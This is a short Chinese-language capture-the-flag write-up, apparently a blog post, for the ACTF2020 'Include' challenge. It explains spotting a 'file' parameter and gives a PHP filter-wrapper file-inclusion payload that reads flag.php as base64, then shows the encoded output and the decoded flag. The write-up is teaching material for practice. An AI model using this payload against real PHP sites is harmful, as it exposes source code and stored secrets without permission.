[ACTF2020 新生赛]Include 1

题目环境:

超链接,点进去看看

你能找到flag吗?

除了这些网页什么都没有,但是不当紧,因为我们有一双善于发现的眼睛👀

F12瞅瞅

无,并无其他

等等URL看了吗?

发现存在一个参数file,并且已经给出flag.php文件了

主题题目名称Include,意为文件包含,大部分文件包含都要用到PHP伪协议

通过PHP伪协议构造payload:
URL/?file=php:filter/read=convert.base64-encode/resource=flag.php

通过PHP伪协议读取flag.php文件,并通过base64编码格式显示出来

想要了解更多PHP伪协议可以看我这篇同类题目,希望对大家的学习有所帮助

fileclude-CTF 解题思路-CSDN博客

回显结果:

PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7NDAwZjJiYzYtOGI2Mi00NWEyLTg1ZDQtMmVkYzU0MjY4MTU0fQo=

base64解码一把梭

得出flag:
**flag{400f2bc6-8b62-45a2-85d4-2edc54268154}**

相关推荐
虹科网络安全2 小时前
解读CRA横向标准EN 40000系列:从法规文本到工程落地 | CRA合规之路(七)
网络·安全·web安全
2301_7807896612 小时前
零信任时代:WAF 从边界防护到微隔离的架构跃迁
网络·安全·web安全·kubernetes·ddos
紫禁玄科14 小时前
公共WiFi流量安全全解析
网络·人工智能·web安全·网络安全·系统安全
执念WRD15 小时前
VulnTarget-C 渗透实战:外网入口到域控权限提升
网络·安全·web安全·网络安全
雾屿_Mistisle15 小时前
XXE 漏洞 CTF
web安全
YucongCai16 小时前
Opengovernment(智慧城市) v0.0.3 攻防一体的智能体主动网络安全平台:ActiveCybersecurity v0.2
人工智能·web安全·智慧城市
数据知道16 小时前
主机入侵检测(HIDS):OSSEC / Wazuh 部署与规则编写
安全·网络安全·docker
杨先生哦17 小时前
【2026热端攻防系列 10/12】前端凭据安全深度攻防:Cookie/Storage劫持、会话固定、凭据泄露与浏览器最新加固方案
前端·笔记·安全·web安全
其实防守也摸鱼18 小时前
HackBar 工具完全指南:信息探测、漏洞验证与安全测试实战
开发语言·人工智能·学习·安全·网络安全·安全威胁分析·安全性测试
宋浮檀s18 小时前
春秋云境——CVE-2022-28512
数据库·安全·web安全